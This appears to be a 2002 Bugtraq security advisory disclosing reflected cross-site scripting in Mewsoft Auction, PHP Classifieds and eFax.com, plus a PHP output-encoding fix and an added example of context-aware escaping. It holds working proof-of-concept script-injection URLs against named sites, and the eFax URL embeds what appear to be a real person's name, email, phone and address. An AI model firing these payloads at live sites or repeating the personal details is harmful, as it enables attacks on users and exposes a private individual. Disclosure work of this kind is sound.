Bugtraq mailing list archives

Mewsoft Auction, PHP Classifieds and eFax.com - CrossSiteScripting issues


From: § o m e 1 <exe () FlashMail com>
Date: Fri, 14 Jun 2002 21:15:05 +0300

Advisory name: SSI & CSS execution in Mewsoft Auction, PHP Classifieds and
eFax.com
Application: Mewsoft Auction (Perl script), PHP Classifieds (PHP), eFax.com
(ASP)
Date: 14.6.2002
Impact: remote user can execute shell commands & cross site scripting

=====================================


CrossSiteScripting @ Mewsoft Auction Script
<example>
http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script&Where=&Sort=Photo&Dir=
</example>

Program Name    : Mewsoft Auction
Program Version : 3.0
Home Page       : http://www.mewsoft.com


=====================================

CrossSiteScripting @ PHP Classifieds
<example>
http://www.xxxx.com/phpclassifieds/latestwap.php?url=<script>alert('OopS');</script>
</example>

Program Name    : PHP Classifieds
Program Version : 6.05
Home Page       : http://www.deltascripts.com/phpclassifieds


=====================================

https://www.efax.com/signup/plus/invalid_cc.asp?FirstName=Nadeem&LastName=ali&OpSys=Win2000&Email=ra3e%5Fe7sas%40hotmail%2Ecom&PIN=9999&referralcode=&service=OR%2DPortland%2D503%2DP&VID=5&BID=427%2D2379%2D3151&HomePhone=5302723558&OFFERCODE=EFAX%5FPLUS&orderNumber=43423716&CreditCardType=MC&CreditCardNumber=:)&expmonth=03&expyear=2003&StreetAddress=10621+Cedar+Ave&StreetAddress2=&City=Grass+Valley&MailRegion=CA&PostalCode=95945&Country=United+States&LogoCode=&reorder_amount=&BillingFreq=Anually&startpage=1&agreed=yes&USCities=OR%2DPortland%2D503%2DP&EurCities=NONE&AsiaCities=NONE&LatCities=NONE&CCNumberError=<script>alert('OopS');</script>

The eFax web site has many CSS issues; that was just one example.


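Solution: DON'T trust the user; filter everything, e.g. in PHP:
<?php
// $input holds untrusted request data; encode it before it reaches the page.
$input = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
echo "<hr>your input was:<b>$input</b>";
?>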

For your information: CSS can SOMETIMES be used to execute shell commands on
the web server (using SSI, depending on the web server configuration), not
only for cookie hijacking...


§ o m e 1
http://127.0.0.1/
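
Added example (not part of the original advisory or of the affected products' code): the "filter everything" advice from the Solution paragraph, applied per output context in PHP. The parameter names Terms and url come from the advisory's URLs; how the real scripts render them, and the helper names esc_html and esc_url, are assumptions.

```php
<?php
// Added example: context-aware output encoding for reflected parameters.
// 'Terms' and 'url' mirror the advisory's URLs; how the real scripts
// use these values is an assumption.

// HTML body or quoted-attribute context: encode < > & " '
function esc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// href/src context: entity encoding alone still lets a javascript: URL
// through, so accept only absolute http(s) URLs and fall back to '#'.
function esc_url(string $s): string
{
    $scheme = parse_url($s, PHP_URL_SCHEME);
    if (!is_string($scheme)
        || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return '#';
    }
    return esc_html($s);
}

// Constructed sample request; the script payload is the one quoted in
// the advisory.
$request = [
    'Terms' => "<script>alert('OopS');</script>",
    'url'   => "javascript:alert('OopS')",
];

$terms = esc_html($request['Terms']);
$link  = esc_url($request['url']);

echo "<p>Results for: <b>{$terms}</b></p>\n";
echo "<a href=\"{$link}\">back</a>\n";

// Self-checks: no markup survives, and the non-http(s) URL is rejected.
assert(strpos($terms, '<') === false);
assert($link === '#');
```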


